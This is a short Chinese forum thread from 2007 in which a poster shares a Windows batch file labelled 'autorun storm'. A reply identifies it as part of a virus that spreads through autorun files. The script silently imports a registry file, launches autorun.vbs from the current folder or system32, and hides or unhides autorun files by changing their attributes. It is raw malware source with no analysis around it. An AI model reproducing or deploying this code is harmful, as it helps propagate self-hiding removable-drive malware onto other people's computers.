1   1  /  1  页   跳转

第一天的收获

第一天的收获

这是那个批处理
@echo off
rem autorun风暴
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end

附件附件:

下载次数:163
文件类型:image/pjpeg
文件大小:
上传时间:2007-2-25 8:14:22
描述:



最后编辑2007-02-25 09:33:00
分享到:
gototop
 

这个是那个 生成很多 autorun 开头的病毒 的某个文件的代码
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT